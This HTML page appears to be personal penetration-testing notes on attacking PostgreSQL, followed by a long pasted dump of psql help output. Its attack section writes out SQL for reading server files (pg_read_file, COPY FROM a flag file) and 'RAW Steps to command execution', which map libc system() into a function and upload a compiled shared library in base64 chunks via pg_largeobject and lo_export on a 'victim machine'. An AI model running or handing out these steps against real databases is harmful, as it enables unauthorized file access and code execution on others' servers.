<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Postgresql</title>
</head><body><br/>
<u><b>Hacking Postgres</b></u><br/>
https://github.com/nixawk/pentest-wiki/blob/master/2.Vulnerability-Assessment/Database-Assessment/postgresql/postgresql_hacking.md<br/>
<br/>
<u><b>Basic Knowledge of Postgresql</b></u><br/>
https://medium.com/@cryptocracker99/a-penetration-testers-guide-to-postgresql-d78954921ee9<br/>
<br/>
<u><b>How to get command execution with 9.x Postgresql</b></u><br/>
https://www.dionach.com/blog/postgresql-9x-remote-command-execution<br/>
<br/>
<u><b>Download Postgresql</b></u><br/>
<u>https://www.enterprisedb.com/downloads/postgres-postgresql-downloads</u><br/>
<br/>
<u><b>Repository</b></u><br/>
https://www.postgresql.org/ftp/source/<br/>
<br/>
<br/>
<br/>
select pg_read_file('postgresql.conf');<br/>
<br/>
select pg_ls_dir('./');<br/>
<br/>
**Authors**: &lt; [nixawk](https://github.com/nixawk) &gt;<br/>
<br/>
----<br/>
<br/>
<br/>
####################<br/>
Read Files<br/>
<br/>
CREATE TABLE word(t TEXT);<br/>
COPY word FROM '/var/lib/postgresql/flag.txt';<br/>
SELECT * FROM word limit 1 offset 0;<br/>
<br/>
####################<br/>
<br/>
<br/>
###########################################<br/>
RAW Steps to command execution<br/>
###########################################<br/>
<br/>
<br/>
On Attacker Machine<br/>
<br/>
gcc -I$(/opt/PostgreSQL/9.6/bin/pg_config --includedir-server) -shared -fPIC -o /opt/pgexec/pg_exec.so /opt/pgexec/pg_exec.c<br/>
<br/>
Now upload the pg_exec.so to the victim machine<br/>
<br/>
On Victim Machine<br/>
<br/>
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE c STRICT;<br/>
<br/>
\set c0 `base64 -w 0 /tmp/xaa`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 0, decode(:'c0', 'base64'));<br/>
<br/>
\set c1 `base64 -w 0 /tmp/xab`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 1, decode(:'c1', 'base64'));<br/>
<br/>
\set c2 `base64 -w 0 /tmp/xac`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 2, decode(:'c2', 'base64'));<br/>
<br/>
\set c3 `base64 -w 0 /tmp/xad`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 3, decode(:'c3', 'base64'));<br/>
<br/>
\set c4 `base64 -w 0 /tmp/xae`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 4, decode(:'c4', 'base64'));<br/>
<br/>
\set c5 `base64 -w 0 /tmp/xaf`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 5, decode(:'c5', 'base64'));<br/>
<br/>
\set c6 `base64 -w 0 /tmp/xag`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 6, decode(:'c6', 'base64'));<br/>
<br/>
\set c7 `base64 -w 0 /tmp/xah`<br/>
INSERT INTO pg_largeobject (loid, pageno, data) values (16420, 7, decode(:'c7', 'base64'));<br/>
<br/>
SELECT lo_export(16420, '/tmp/pg_exec.so');<br/>
<br/>
<br/>
#POSTGRESQL HACK#<br/>
<br/>
----<br/>
<br/>
##DATABASE CONNECTION##<br/>
<br/>
Please connect to **postgresql** database, &nbsp;<br/>
<br/>
```<br/>
lab:~/ $ psql -h 127.0.0.1 -U postgres -W<br/>
```<br/>
<br/>
----<br/>
<br/>
##DATABASE COMMANDS##<br/>
<br/>
```<br/>
postgres=# help<br/>
You are using psql, the command-line interface to PostgreSQL.<br/>
Type: &nbsp;\copyright for distribution terms<br/>
&nbsp; &nbsp; &nbsp; &nbsp;\h for help with SQL commands<br/>
&nbsp; &nbsp; &nbsp; &nbsp;\? for help with psql commands<br/>
&nbsp; &nbsp; &nbsp; &nbsp;\g or terminate with semicolon to execute query<br/>
&nbsp; &nbsp; &nbsp; &nbsp;\q to quit<br/>
```<br/>
<br/>
```<br/>
postgres=# \h<br/>
Available help:<br/>
&nbsp; ABORT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE FOREIGN DATA WRAPPER &nbsp; &nbsp; &nbsp;DROP SEQUENCE<br/>
&nbsp; ALTER AGGREGATE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE FOREIGN TABLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP SERVER<br/>
&nbsp; ALTER COLLATION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE FUNCTION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP TABLE<br/>
&nbsp; ALTER CONVERSION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE GROUP &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP TABLESPACE<br/>
&nbsp; ALTER DATABASE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE INDEX &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP TEXT SEARCH CONFIGURATION<br/>
&nbsp; ALTER DEFAULT PRIVILEGES &nbsp; &nbsp; &nbsp; &nbsp; CREATE LANGUAGE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP TEXT SEARCH DICTIONARY<br/>
&nbsp; ALTER DOMAIN &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE MATERIALIZED VIEW &nbsp; &nbsp; &nbsp; &nbsp; DROP TEXT SEARCH PARSER<br/>
&nbsp; ALTER EVENT TRIGGER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE OPERATOR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP TEXT SEARCH TEMPLATE<br/>
&nbsp; ALTER EXTENSION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE OPERATOR CLASS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP TRIGGER<br/>
&nbsp; ALTER FOREIGN DATA WRAPPER &nbsp; &nbsp; &nbsp; CREATE OPERATOR FAMILY &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP TYPE<br/>
&nbsp; ALTER FOREIGN TABLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE ROLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP USER<br/>
&nbsp; ALTER FUNCTION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE RULE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP USER MAPPING<br/>
&nbsp; ALTER GROUP &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE SCHEMA &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP VIEW<br/>
&nbsp; ALTER INDEX &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE SEQUENCE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;END<br/>
&nbsp; ALTER LANGUAGE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE SERVER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;EXECUTE<br/>
&nbsp; ALTER LARGE OBJECT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE TABLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; EXPLAIN<br/>
&nbsp; ALTER MATERIALIZED VIEW &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE TABLE AS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;FETCH<br/>
&nbsp; ALTER OPERATOR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE TABLESPACE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;GRANT<br/>
&nbsp; ALTER OPERATOR CLASS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE TEXT SEARCH CONFIGURATION INSERT<br/>
&nbsp; ALTER OPERATOR FAMILY &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE TEXT SEARCH DICTIONARY &nbsp; &nbsp;LISTEN<br/>
&nbsp; ALTER ROLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE TEXT SEARCH PARSER &nbsp; &nbsp; &nbsp; &nbsp;LOAD<br/>
&nbsp; ALTER RULE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE TEXT SEARCH TEMPLATE &nbsp; &nbsp; &nbsp;LOCK<br/>
&nbsp; ALTER SCHEMA &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE TRIGGER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; MOVE<br/>
&nbsp; ALTER SEQUENCE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE TYPE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;NOTIFY<br/>
&nbsp; ALTER SERVER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE USER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;PREPARE<br/>
&nbsp; ALTER SYSTEM &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; CREATE USER MAPPING &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;PREPARE TRANSACTION<br/>
&nbsp; ALTER TABLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;CREATE VIEW &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;REASSIGN OWNED<br/>
&nbsp; ALTER TABLESPACE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DEALLOCATE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; REFRESH MATERIALIZED VIEW<br/>
&nbsp; ALTER TEXT SEARCH CONFIGURATION &nbsp;DECLARE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;REINDEX<br/>
&nbsp; ALTER TEXT SEARCH DICTIONARY &nbsp; &nbsp; DELETE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; RELEASE SAVEPOINT<br/>
&nbsp; ALTER TEXT SEARCH PARSER &nbsp; &nbsp; &nbsp; &nbsp; DISCARD &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;RESET<br/>
&nbsp; ALTER TEXT SEARCH TEMPLATE &nbsp; &nbsp; &nbsp; DO &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; REVOKE<br/>
&nbsp; ALTER TRIGGER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP AGGREGATE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ROLLBACK<br/>
&nbsp; ALTER TYPE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP CAST &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;ROLLBACK PREPARED<br/>
&nbsp; ALTER USER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP COLLATION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ROLLBACK TO SAVEPOINT<br/>
&nbsp; ALTER USER MAPPING &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP CONVERSION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;SAVEPOINT<br/>
&nbsp; ALTER VIEW &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP DATABASE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;SECURITY LABEL<br/>
&nbsp; ANALYZE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP DOMAIN &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;SELECT<br/>
&nbsp; BEGIN &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP EVENT TRIGGER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SELECT INTO<br/>
&nbsp; CHECKPOINT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP EXTENSION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SET<br/>
&nbsp; CLOSE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP FOREIGN DATA WRAPPER &nbsp; &nbsp; &nbsp; &nbsp;SET CONSTRAINTS<br/>
&nbsp; CLUSTER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP FOREIGN TABLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SET ROLE<br/>
&nbsp; COMMENT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP FUNCTION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;SET SESSION AUTHORIZATION<br/>
&nbsp; COMMIT &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP GROUP &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SET TRANSACTION<br/>
&nbsp; COMMIT PREPARED &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP INDEX &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; SHOW<br/>
&nbsp; COPY &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP LANGUAGE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;START TRANSACTION<br/>
&nbsp; CREATE AGGREGATE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP MATERIALIZED VIEW &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; TABLE<br/>
&nbsp; CREATE CAST &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP OPERATOR &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;TRUNCATE<br/>
&nbsp; CREATE COLLATION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP OPERATOR CLASS &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;UNLISTEN<br/>
&nbsp; CREATE CONVERSION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP OPERATOR FAMILY &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; UPDATE<br/>
&nbsp; CREATE DATABASE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP OWNED &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; VACUUM<br/>
&nbsp; CREATE DOMAIN &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;DROP ROLE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;VALUES<br/>
&nbsp; CREATE EVENT TRIGGER &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP RULE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;WITH<br/>
&nbsp; CREATE EXTENSION &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; DROP SCHEMA &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br/>
<br/>
```<br/>
<br/>
```<br/>
postgres=# \?<br/>
General<br/>
&nbsp; \copyright &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; show PostgreSQL usage and distribution terms<br/>
&nbsp; \g [FILE] or ; &nbsp; &nbsp; &nbsp; &nbsp; execute query (and send results to file or |pipe)<br/>
&nbsp; \gset [PREFIX] &nbsp; &nbsp; &nbsp; &nbsp; execute query and store results in psql variables<br/>
&nbsp; \h [NAME] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;help on syntax of SQL commands, * for all commands<br/>
&nbsp; \q &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; quit psql<br/>
&nbsp; \watch [SEC] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; execute query every SEC seconds<br/>
<br/>
Query Buffer<br/>
&nbsp; \e [FILE] [LINE] &nbsp; &nbsp; &nbsp; edit the query buffer (or file) with external editor<br/>
&nbsp; \ef [FUNCNAME [LINE]] &nbsp;edit function definition with external editor<br/>
&nbsp; \p &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; show the contents of the query buffer<br/>
&nbsp; \r &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; reset (clear) the query buffer<br/>
&nbsp; \s [FILE] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;display history or save it to file<br/>
&nbsp; \w FILE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;write query buffer to file<br/>
<br/>
Input/Output<br/>
&nbsp; \copy ... &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;perform SQL COPY with data stream to the client host<br/>
&nbsp; \echo [STRING] &nbsp; &nbsp; &nbsp; &nbsp; write string to standard output<br/>
&nbsp; \i FILE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;execute commands from file<br/>
&nbsp; \ir FILE &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; as \i, but relative to location of current script<br/>
&nbsp; \o [FILE] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;send all query results to file or |pipe<br/>
&nbsp; \qecho [STRING] &nbsp; &nbsp; &nbsp; &nbsp;write string to query output stream (see \o)<br/>
<br/>
Informational<br/>
&nbsp; (options: S = show system objects, + = additional detail)<br/>
&nbsp; \d[S+] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; list tables, views, and sequences<br/>
&nbsp; \d[S+] &nbsp;NAME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; describe table, view, sequence, or index<br/>
&nbsp; \da[S] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list aggregates<br/>
&nbsp; \db[+] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list tablespaces<br/>
&nbsp; \dc[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list conversions<br/>
&nbsp; \dC[+] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list casts<br/>
&nbsp; \dd[S] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;show object descriptions not displayed elsewhere<br/>
&nbsp; \ddp &nbsp; &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list default privileges<br/>
&nbsp; \dD[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list domains<br/>
&nbsp; \det[+] [PATTERN] &nbsp; &nbsp; &nbsp;list foreign tables<br/>
&nbsp; \des[+] [PATTERN] &nbsp; &nbsp; &nbsp;list foreign servers<br/>
&nbsp; \deu[+] [PATTERN] &nbsp; &nbsp; &nbsp;list user mappings<br/>
&nbsp; \dew[+] [PATTERN] &nbsp; &nbsp; &nbsp;list foreign-data wrappers<br/>
&nbsp; \df[antw][S+] [PATRN] &nbsp;list [only agg/normal/trigger/window] functions<br/>
&nbsp; \dF[+] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list text search configurations<br/>
&nbsp; \dFd[+] [PATTERN] &nbsp; &nbsp; &nbsp;list text search dictionaries<br/>
&nbsp; \dFp[+] [PATTERN] &nbsp; &nbsp; &nbsp;list text search parsers<br/>
&nbsp; \dFt[+] [PATTERN] &nbsp; &nbsp; &nbsp;list text search templates<br/>
&nbsp; \dg[+] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list roles<br/>
&nbsp; \di[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list indexes<br/>
&nbsp; \dl &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;list large objects, same as \lo_list<br/>
&nbsp; \dL[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list procedural languages<br/>
&nbsp; \dm[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list materialized views<br/>
&nbsp; \dn[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list schemas<br/>
&nbsp; \do[S] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list operators<br/>
&nbsp; \dO[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list collations<br/>
&nbsp; \dp &nbsp; &nbsp; [PATTERN] &nbsp; &nbsp; &nbsp;list table, view, and sequence access privileges<br/>
&nbsp; \drds [PATRN1 [PATRN2]] list per-database role settings<br/>
&nbsp; \ds[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list sequences<br/>
&nbsp; \dt[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list tables<br/>
&nbsp; \dT[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list data types<br/>
&nbsp; \du[+] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list roles<br/>
&nbsp; \dv[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list views<br/>
&nbsp; \dE[S+] [PATTERN] &nbsp; &nbsp; &nbsp;list foreign tables<br/>
&nbsp; \dx[+] &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;list extensions<br/>
&nbsp; \dy &nbsp; &nbsp; [PATTERN] &nbsp; &nbsp; &nbsp;list event triggers<br/>
&nbsp; \l[+] &nbsp; [PATTERN] &nbsp; &nbsp; &nbsp;list databases<br/>
&nbsp; \sf[+] FUNCNAME &nbsp; &nbsp; &nbsp; &nbsp;show a function's definition<br/>
&nbsp; \z &nbsp; &nbsp; &nbsp;[PATTERN] &nbsp; &nbsp; &nbsp;same as \dp<br/>
<br/>
Formatting<br/>
&nbsp; \a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; toggle between unaligned and aligned output mode<br/>
&nbsp; \C [STRING] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;set table title, or unset if none<br/>
&nbsp; \f [STRING] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;show or set field separator for unaligned query output<br/>
&nbsp; \H &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; toggle HTML output mode (currently off)<br/>
&nbsp; \pset [NAME [VALUE]] &nbsp; set table output option<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;(NAME := {format|border|expanded|fieldsep|fieldsep_zero|footer|null|<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;numericlocale|recordsep|recordsep_zero|tuples_only|title|tableattr|pager})<br/>
&nbsp; \t [on|off] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;show only rows (currently off)<br/>
&nbsp; \T [STRING] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;set HTML &lt;table&gt; tag attributes, or unset if none<br/>
&nbsp; \x [on|off|auto] &nbsp; &nbsp; &nbsp; toggle expanded output (currently off)<br/>
<br/>
Connection<br/>
&nbsp; \c[onnect] {[DBNAME|- USER|- HOST|- PORT|-] | conninfo}<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;connect to new database (currently "postgres")<br/>
&nbsp; \encoding [ENCODING] &nbsp; show or set client encoding<br/>
&nbsp; \password [USERNAME] &nbsp; securely change the password for a user<br/>
&nbsp; \conninfo &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;display information about current connection<br/>
<br/>
Operating System<br/>
&nbsp; \cd [DIR] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;change the current working directory<br/>
&nbsp; \setenv NAME [VALUE] &nbsp; set or unset environment variable<br/>
&nbsp; \timing [on|off] &nbsp; &nbsp; &nbsp; toggle timing of commands (currently off)<br/>
&nbsp; \! [COMMAND] &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; execute command in shell or start interactive shell<br/>
<br/>
Variables<br/>
&nbsp; \prompt [TEXT] NAME &nbsp; &nbsp;prompt user to set internal variable<br/>
&nbsp; \set [NAME [VALUE]] &nbsp; &nbsp;set internal variable, or list all if no parameters<br/>
&nbsp; \unset NAME &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;unset (delete) internal variable<br/>
<br/>
Large Objects<br/>
&nbsp; \lo_export LOBOID FILE<br/>
&nbsp; \lo_import FILE [COMMENT]<br/>
&nbsp; \lo_list<br/>
&nbsp; \lo_unlink LOBOID &nbsp; &nbsp; &nbsp;large object operations<br/>
<br/>
```<br/>
<br/>
